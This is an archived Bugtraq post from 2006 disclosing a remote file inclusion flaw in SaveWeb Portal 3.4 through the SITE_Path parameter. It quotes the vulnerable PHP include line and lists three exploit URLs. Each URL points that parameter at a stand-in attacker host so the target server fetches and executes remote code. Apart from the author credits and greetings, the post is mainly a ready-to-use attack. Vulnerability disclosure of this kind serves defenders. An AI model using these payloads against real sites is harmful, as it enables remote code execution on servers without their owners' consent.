[<prev] [next>] [month] [year] [list]
Date: 2 Aug 2006 11:19:30 -0000
From: x0r0n@...mail.com
To: bugtraq@...urityfocus.com
Subject: SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability
-
#Author: xoron
-
#script: SaveWeb Portal
-
#Class : Remote
-
#cont@... x0r0n[at]hotmail[dot]com
-
#CODE: include($SITE_Path."poll/poll.php")
-
#Exploit:
http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?
http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?
-
#Thanx : WWW.CYBER-WARRiOR.ORG
-
#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior users.
///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\
Hosted by DataForce ISP -
Powered by Openwall GNU/*/Linux